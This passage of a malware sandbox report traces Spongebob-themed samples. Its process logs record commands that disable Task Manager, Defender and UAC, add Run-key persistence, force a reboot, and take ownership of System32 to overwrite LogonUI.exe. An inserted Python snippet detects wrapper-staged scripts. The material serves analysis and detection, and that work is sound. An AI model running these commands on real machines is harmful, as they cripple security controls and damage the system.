PID 4680 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4680 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4680 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4680 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3508 wrote to memory of 644 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3508 wrote to memory of 644 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3508 wrote to memory of 644 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\horrorbob.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\System64\bg.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Kernel 64" /t REG_SZ /F /D "C:\System64\SysKern64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\sp.vbs"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa394e055 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp

Files

memory/4928-0-0x0000000000400000-0x0000000001D7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\horrorbob.bat

MD5 fb64a183fc63eada7f48e781677907d7
SHA1 cce8bf6ef41f689ae3fe8a5ff88aa1e550adc47d
SHA256 397e6fe317d2be9d944b8df19ea005240fedfffe09bb8fbb62042fa2a5810b20
SHA512 a8c043404c62dddf21f1521c0917970e9e46d78f0c6bba6a74a7f907cf6cf27e6ed0bac831e9bb9a44d393be6c5c8a255aa0d6ac997a49a0549feb1a14bcba5a

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\prompt.vbs

MD5 108887a0632fa8fcdc1ca1cc04fddb8b
SHA1 f4bc0266a7ed53b54027bc552ab64328623ab9cd
SHA256 8dce4ee27dac1fc5d3d11c160d8aa566a0f92c372dba5b0db47a8f9c3a8abb2e
SHA512 f11347bfdd7e37f379411d7bb58e07ccb7e080ba572e1e3776a3d64d620f02aa1a875db5bffc7eb7861c47ed545498bd13d1ce5e1a3e53dfb699d28a50166777

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\bg.bmp

MD5 56fd86679ff0b8c3b4e7851c51c78351
SHA1 8e5ae5b7167933e88840dcd06c8fca5d12a59525
SHA256 abcd305f275345b6f8f3896bc1a2e46e039e4fb7c5e820e63b1dc4b4c400a095
SHA512 d0b150488a7a7cf687c73bf16277b073858bf6391c1958a2fccf10343b2fe5ec4c3bb8627e66c7fbf7f3fbaa8a8abfe5a9cb27c412873da604d2e6721d184c97

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\SysKern64.exe

MD5 382c03015ef6a00c840998c6196b686e
SHA1 9f008126293c66c43a421b572e877ad62caeda45
SHA256 d7ec176b21ffe803b880611f75d7275bba6c4b042dc6e864245ebd4c85699735
SHA512 e01435eafb51a4c1ebe853e1494d14cccf18f617e675ea442c02b281de986cb3dcd1425c9c9fddeaaf6838f81787577cad047df03f4cb9fb67db33d560b2eeb4

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU_16037.txt

MD5 d036a9ad0dff58548e91a68c58ff7964
SHA1 8c6265a188fba55db49b6d744a74bbd78f562efd
SHA256 19af8f37f3b6510b8da2677b22aa43123a3898d830f643237a52346c5b3d763d
SHA512 6e93fbd051a9461a8c8eaeb30f9fdef74ca6a18bf9e60d3bd5fe702f2e9e0946059c6dc23975264f99363538e41ac0f9a1bc0dec54df5253c4919012d4065fc5

C:\Users\Admin\AppData\Local\Temp\5AB3.tmp\sp.vbs

MD5 5bd73be3d9435a2ff6510c84bc643c0e
SHA1 de4ee1b6fbe2a364a1c5c2e8a69c196a370a3b4a
SHA256 9df6c43228d9fc70ef9698abd10435f2ae864a1364c6f860e822dc52487b0e46
SHA512 7c581bc3757fdd816282bd26419cb456c88792900294507701d809b8b0478b4fd5462398359a65a6f366aabdb623a1bc7caceda30111995fb4b1928841b279ac

memory/4928-93-0x0000000000400000-0x0000000001D7C000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Network

N/A

Files

memory/2204-0-0x0000000000900000-0x000000000090A000-memory.dmp

memory/2204-1-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/2204-2-0x000000001B3B0000-0x000000001B430000-memory.dmp

memory/2204-3-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp

memory/2204-4-0x000000001B3B0000-0x000000001B430000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8136.tmp\SpongebobNoSleep.cmd""

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:80 www.microsoft.com tcp
GB 92.123.241.137:80 www.microsoft.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 137.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/2308-0-0x0000000000400000-0x000000000079B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8136.tmp\SpongebobNoSleep.cmd

MD5 f0f8f16b1be67c7ce5d854701fae56ce
SHA1 9ef78e1bec7b3f7190231d7d1179629db0756a38
SHA256 71f31c42e96e8dd9c25b2d36959d2ee75948a10aaeae25dffc2dd03759e53f83
SHA512 ef514835e6b4ead1c649846082beed6182947e0cd90538dea6ad8290c177c657e6f9c2e4d9f473de300fb10fb1f74e691911d75239dbf926ad5cf46b7370fd0e

memory/2308-12-0x0000000000400000-0x000000000079B000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20231215-en

Max time kernel

90s

Max time network

124s

Command Line

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\hh.exe N/A
N/A N/A C:\Windows\hh.exe N/A

Processes

C:\Windows\hh.exe

"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\help.chm"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

122s

Max time network

127s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Signatures

N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/4872-0-0x0000000000790000-0x000000000079E000-memory.dmp

memory/4872-2-0x000000001B290000-0x000000001B2A0000-memory.dmp

memory/4872-1-0x00007FFE8CE20000-0x00007FFE8D8E1000-memory.dmp

memory/4872-5-0x00007FFE8CE20000-0x00007FFE8D8E1000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

141s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\711B.tmp\SpongebobNoSleep.cmd""

Network

N/A

Files

memory/3048-0-0x0000000000400000-0x000000000079B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\711B.tmp\SpongebobNoSleep.cmd

MD5 f0f8f16b1be67c7ce5d854701fae56ce
SHA1 9ef78e1bec7b3f7190231d7d1179629db0756a38
SHA256 71f31c42e96e8dd9c25b2d36959d2ee75948a10aaeae25dffc2dd03759e53f83
SHA512 ef514835e6b4ead1c649846082beed6182947e0cd90538dea6ad8290c177c657e6f9c2e4d9f473de300fb10fb1f74e691911d75239dbf926ad5cf46b7370fd0e

memory/3048-17-0x0000000000400000-0x000000000079B000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\44D9.tmp\SpongebobFuck.cmd""
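
The UPX-packed SpongebobNoSleep.exe (behavioral11 and behavioral3 above) and SpongebobFuck.exe (this detonation, behavioral8) show the same two-step launch: the wrapper writes a .cmd carrying its own file stem into a fresh <4 hex digits>.tmp directory under the user's Temp and runs it with cmd /c, which fits the source\Bat To Exe Converter directory seen in behavioral14. The block below is an added example, not part of this report or of the sample, of detection logic that correlates such a launch with its parent process. The event records are constructed from the process trees in this report (the parent PIDs 3048 and 3236 come from the memory-dump names; child PIDs are invented), and as a generalization it also covers the wscript.exe-launched .vbs from a nested X.tmp\Y.tmp stage that behavioral1 shows. Field names and rule names are the example's own.

```python
import re
from pathlib import PureWindowsPath

# A script inside a fresh "<4 hex digits>.tmp" directory (possibly nested) under the
# user's Temp, as every detonation in this report shows (8136.tmp, 711B.tmp,
# 44D9.tmp, 145B.tmp\145C.tmp). The directory-name pattern is an observation from
# these runs, not documented behaviour of the converter.
STAGED_SCRIPT_RE = re.compile(
    r'(?P<path>[A-Z]:\\[^"]*?\\AppData\\Local\\Temp\\(?:[0-9A-F]{4}\.tmp\\)+'
    r'[^\\"\s]+\.(?:cmd|bat|vbs|js))', re.I)
# cmd.exe / wscript.exe / cscript.exe as the first token, with or without path and quotes.
LAUNCHER_RE = re.compile(
    r'^\s*"?(?:[A-Z]:\\[^"]*?\\)?(?P<exe>cmd|wscript|cscript)(?:\.exe)?"?\s', re.I)


def staged_script(cmdline: str):
    """(launcher, script path) if cmdline runs a script out of a Temp\\XXXX.tmp stage, else None."""
    launcher = LAUNCHER_RE.match(cmdline)
    script = STAGED_SCRIPT_RE.search(cmdline)
    if not (launcher and script):
        return None
    return launcher.group("exe").lower(), script.group("path")


def find_wrapper_stages(events: list[dict]) -> list[dict]:
    """Correlate each staged-script launch with its parent process.

    A parent whose file stem equals the script's stem (SpongebobNoSleep.exe ->
    SpongebobNoSleep.cmd) is the wrapper pattern this report shows and gets the
    high-confidence rule; any other staged launch is still reported, lower."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = []
    for ev in events:
        hit = staged_script(ev["cmdline"])
        if not hit:
            continue
        launcher, script = hit
        parent = by_pid.get(ev["ppid"])
        parent_image = parent["image"] if parent else ""
        same_stem = (PureWindowsPath(parent_image).stem.lower()
                     == PureWindowsPath(script).stem.lower())
        findings.append({
            "rule": "wrapper_drops_and_runs_own_script" if same_stem else "script_run_from_temp_stage",
            "pid": ev["pid"], "launcher": launcher, "script": script, "parent": parent_image,
        })
    return findings


# Constructed process events, copied from the process trees in this report.
# Parent PIDs 3048 / 3236 / 2212 are from the report; child PIDs 3049 / 3237 and the
# explorer.exe control pair are invented.
T = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 3048, "ppid": 1, "image": T + r"\SpongebobNoSleep.exe",
     "cmdline": '"' + T + r'\SpongebobNoSleep.exe"'},
    {"pid": 3049, "ppid": 3048, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": 'cmd /c ""' + T + r'\711B.tmp\SpongebobNoSleep.cmd""'},
    {"pid": 3236, "ppid": 1, "image": T + r"\previous versions\SpongebobFuck.exe",
     "cmdline": '"' + T + r'\previous versions\SpongebobFuck.exe"'},
    {"pid": 3237, "ppid": 3236, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""' + T + r'\44D9.tmp\SpongebobFuck.cmd""'},
    {"pid": 2212, "ppid": 1, "image": T + r"\SpongebobNoSleep2.exe",
     "cmdline": '"' + T + r'\SpongebobNoSleep2.exe"'},
    {"pid": 1048, "ppid": 2212, "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r'"C:\Windows\sysnative\wscript.exe" ' + T + r'\145B.tmp\145C.tmp\145D.vbs //Nologo'},
    # Benign control: a user-launched build script outside Temp must not fire.
    {"pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4001, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\Desktop\build.cmd"'},
]

if __name__ == "__main__":
    for f in find_wrapper_stages(SAMPLE_EVENTS):
        print(f)
```

The stem comparison is what separates a self-extracting wrapper from an ordinary script run out of Temp; the doubled quotes in cmd /c ""…"" are cmd's normal quoting for a quoted path and carry no signal on their own.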

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/3236-0-0x0000000000400000-0x00000000007BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\44D9.tmp\SpongebobFuck.cmd

MD5 7a918ed93f7fb297e05464edccc46756
SHA1 9464288fed7ba5d88928265882def5e05ffbe7db
SHA256 82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512 cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1

memory/3236-12-0x0000000000400000-0x00000000007BF000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

135s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp

Files

memory/1628-0-0x0000000000550000-0x000000000055E000-memory.dmp

memory/1628-1-0x00007FFA7CD50000-0x00007FFA7D811000-memory.dmp

memory/1628-2-0x00000000026D0000-0x00000000026E0000-memory.dmp

memory/1628-5-0x00007FFA7CD50000-0x00007FFA7D811000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

